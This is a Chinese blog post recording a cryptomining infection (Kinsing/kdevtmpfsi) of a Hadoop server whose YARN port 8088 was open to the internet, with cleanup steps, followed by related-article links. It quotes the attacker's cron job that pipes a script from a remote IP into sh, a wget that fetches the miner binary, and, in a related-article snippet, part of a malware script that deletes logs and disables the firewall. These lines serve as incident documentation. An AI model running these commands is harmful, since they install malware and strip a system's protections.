记录一次被挖矿僵尸攻击过程

最新推荐文章于 2023-01-31 15:49:10 发布
最新推荐文章于 2023-01-31 15:49:10 发布
阅读量629 收藏
点赞数
分类专栏: 学习笔记 文章标签: hadoop hdfs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36101162/article/details/105984736
版权

对病毒背景的了解来自这篇文章
https://blog.csdn.net/weixin_43970890/article/details/103857487

研究hadoop的时候提交作业到yarn上,结果8088端口开放到公网,被挖矿病毒攻击,只要一启动yarn就会执行kinsing(守护进程)以及kdevtmpfsi进程,cpu瞬间被占用到100%,服务器瘫痪。

同样的redis的6379端口也会被攻击。

查看定时命令 crontab -l
会被写入形如这样的任务

* * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1

每分钟请求一次这个地址。

查看守护进程kinsing看到如下:

ps -ef|grep kinsing
hadoop    8768  7273  0 22:28 ?        00:00:00 wget -O /var/tmp/kinsing http://144.217.117.146/kinsing
hadoop   11306  4680  0 22:42 pts/0    00:00:00 grep --color=auto kinsing

守护进程目录:/var/tmp/kinsing
执行进程目录:/tmp/kdevtmpfsi

解决方案:

由于是云服务器,cpu占满,导致服务器无法登录,首先在云服务器安全组中,关闭对所有ip的入方向的允许(由于不是商用,写了一个当地默认IP地址)。

重启云服务器,随后进入服务器杀死kinsing和kdevtmpfsi的进程,同时进入进程目录删除kdevtmpfsi和kinsing执行文件

然后crontab -r清除定时任务。

之后再重启yarn就不会被攻击了。

Ryan-Xia
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
植物大战僵尸一代素材包
02-25
总的来说,"植物大战僵尸一代素材包"为我们提供了一个宝贵的资源库,它不仅展示了游戏背后的艺术创作过程,也是学习2D游戏动画制作的实例教材。通过研究和分析这些素材,我们可以更好地理解游戏开发的各个环节,提升...
论文研究-基于僵尸网络的DDoS攻击研究与仿真 .pdf
08-15
基于僵尸网络的DDoS攻击研究与仿真,徐爱梅,任建华,基于僵尸网络(BotNet)的分布式拒绝服务攻击(DDoS,Distributed Denial of Service)是一种结合了Botnet和DDoS攻击二者优点的新型的网络攻击。��
Hadoop基础之《(8)—yarn dr.who用户漏洞被挖矿
最新发布
csj50的专栏
01-31 830
dr.who用户执行了很多application,服务器被挖矿。因为yarn的8088端口REST API没有做权限控制,允许任意用户通过API创建任务。5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件。1、检查/tmp和/var/tmp目录,删除异常文件。2、检查crontab -l,删除可疑脚本。2、构建json文件。
linux 病毒 自动写crontab,记一次挖矿病毒kdevtmpfsi,xmrig,定时任务crontab不能更改,及莫名的curl,致使CPU太高,占用网络链接数过大的解决办法...
weixin_30074929的博客
05-06 886
1、警告html1、警告在linux中使用docker,redis,ssh,tomcat等 的时候,建议所有更改为本身自定义的端口,开启防火墙并开发本身须要的端口。ssh2、解决病毒1.docker 引起的挖矿程序的惨案发现linux系统中使用的docker自动建立了一些镜像,而且自动建立了不少容器。docker ps查看多了一些不是工做人员建立的容器9123b9382935 fel...
YARN Resourcemanager引入挖矿病毒的经历
lm709409753的专栏
06-01 3314
原因 由于同事为了测试方便,把YARN RM的8088对外网开放了,导致攻击者可以通过RM 的rest api直接可以提交应用。 解决参考博客 https://labitacoranet.wordpress.com/2018/05/16/forensic-analysis-of-a-cryptocurrency-mining-attack-in-a-big-data-cluster/ 我解...
Yarn遭到挖矿病毒攻击
weixin_30485291的博客
01-16 862
测试环境在阿里云上暴露出了公网端口,前一段时间CDH集群原本是开启了Kerberos认证,但是因为大家反映使用麻烦,所以就又关闭了Kerberos。 最近几天大家普遍反映测试环境上hive和hdfs job执行很慢,yarn进程的cpu使用率持续在200%以上,经过排除CPU使用率已经连续两天100%且没有降下来,查看job如下 有39个job明细多余开发提交的任务数量,且User来自dr...
yarn程序被劫持运行矿机程序
capetown的博客
12-20 822
一次问题排查过程,希望对他人有借鉴作用,不喜请喷。 一、基本现象 Nodemanager进程挂掉 2、yarn日志 进入系统查看yarn日志 #cd /var/log/hadoop-yarn/yarn #less yarn-yarn-nodemanager-so81.novalocal.log 发现没有异常错误信息 3、系统负载 通过top 命令结合c  M 查看使用cpu...
一次Linux系统被攻击的分析过程.pdf
09-06
在本文中,我们将对 Linux 服务器被攻击的分析过程进行详细的介绍,探讨服务器遭受攻击的原因、解决方法和防范措施。 Linux 服务器遭受攻击的原因可以归纳为七种:口令攻击、拒绝服务攻击、网络欺骗攻击、网络监听...
最后一只僵尸死于中间车的概率
10-16
假设:僵尸啃大蒜后将等概率的到相邻两行(如果在第1或5行则只能进入2行或4行),:当僵尸在某一列的某一个大蒜啃满4次后,第5次在该列啃该大蒜的时候将进入相邻行的下一列,到最后一列时会被车撞死。问:该僵尸死于...
处理处理kdevtmpfsi挖矿病毒以及他的守护进程kinsing
Owen_goodman的博客
12-27 8357
服务器CPU资源占用一直处于100%的状态,检查发现是kdevtmpfsi占用导致的,此进程为挖矿程序。 处理步骤如下: kdevtmpfsi 进程处理: 1、# top 查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi 2、# netstat -natp 根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外i...
阿里云服务器中挖矿病毒了,名称为 kinsing
qq_40215763的博客
05-06 4269
五一本来就没有过好,上班来了第一天同事就说页面打不开了 不开心的我就打开看看项目页面,不看不要紧一看还真是见鬼了 赶紧查看一下 top查看了一下 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 25638 root 10 -10 25518 ...
彻底解决 centor os kdevtmpfsi进程占用200% 导致部署应用重启
那些年我们踩过的坑
01-06 1034
网上搜索了解大概是个挖矿木马 1、top 找到主进程 2、systemctl status 主进程 3、kill -9 杀掉相关进程 4、find / -name "kdevtmpfsi" find / -name "kinsing" 删掉两个相关文件 rm -rf /tmp/kdevtmpfsi rm -rf /var/tmp/kinsing 5、netstat -natp 查...
kinsing挖矿僵尸网络初始化脚本-注释版
makaisghr的专栏
06-01 1430
#!/bin/sh #Linux ulimit命令用于控制shell程序的资源。连接数设置为最大 ulimit -n 65535 #删除系统日志 rm -rf /var/log/syslog #关闭 /tmp /var/tmp 目录不可更改属性 chattr -iua /tmp/ chattr -iua /var/tmp/ #关闭防火墙 UFW,全称 Uncomplicated Firewall,是通过 iptables 实现的防火墙工具 ufw disable #清空iptables iptables
挖矿是程序病毒解决过程
dengshanzhe3Q的博客
12-11 693
现象:cpu 90%以上 处理过程:1.kill -9 pid 删除进程,删除后cpu下去后,又升起 2.怀疑有定时任务启动 :crontab -l 3 .进入 /var/spool/cron/ ,查看存在定时任务 4. ps -ef | grep 'tauafa' 查出所有进...
linux下“kdevtmpfsi“与“kinsing“进程导致系统卡顿
全栈开发者的博客
11-23 1268
系统卡顿,top下发下cpu异常 kdevtmpfsi是一种挖矿病毒,而且有守护进程,单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要kill后才能解决问题。 1.杀掉进程并删除文件(杀掉之后还会重新启动) ps -aux | grep kinsing kill -9 15881 ps -aux | grep kdevtmpfsi kill -9 15881 rm -rf /tmp/kdevtmpfsi rm -rf /var/tmp/kins.
yarn进程CPU占用率百分之百
love_lixr的博客
08-06 3853
阿里云出现挖矿程序 Linux根绝Pid查看进程名 top命令查看占用CPU高的进程 ps -aux | grep PID号 ps -ef | grep PID号 查看yarn程序的信息 ps -ef | grep yarn yarn 46185 1 99 May03 ?  4 - 19 : 04 : 28 / tmp / java - c / tmp / w.conf yarn挖矿...
记录一下排除挖矿攻击过程
husongbo的博客
10-10 631
首先,我发现自己的服务器CPU占用率达到了99.9% WTF?虽然我用的是腾讯云的学生版只有1核,但是也不至于干满了啊 于是撸起袖子,先把这个进程杀掉 kill -9 PID ,然后顺着目录找到这个伪装成java的东西 把他干掉,通过crontab -l -u hadoop命令,发现了有定时任务再启动 进入cd /var/spool/cron/目录发现 看一下这个hadoop的...
linux 中了挖矿病毒
qq_43373608的博客
04-16 2560
文章目录中毒特征磁盘cpu 跑满 100%如何处理反复发作 中毒特征磁盘cpu 跑满 100% 如何处理 电脑中了挖矿病毒 ps -aux | grep kinsing root 19447 0.0 1.8 119172 35084 ? Sl 4月15 0:04 /var/tmp/kinsing root 27247 0.0 0.0 112728 ...
搭建与源码解析:探索Mirai僵尸网络的DDoS攻击技术
- 僵尸网络由攻击者操控的大量被感染主机组成,这些主机通过命令和控制服务器(CNC服务器)接收到攻击指令,形成了一种可扩展的恶意网络。 - 僵尸网络的形成依赖于bot程序的传播,如Mirai通过 Telnet爆破和DNS服务...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值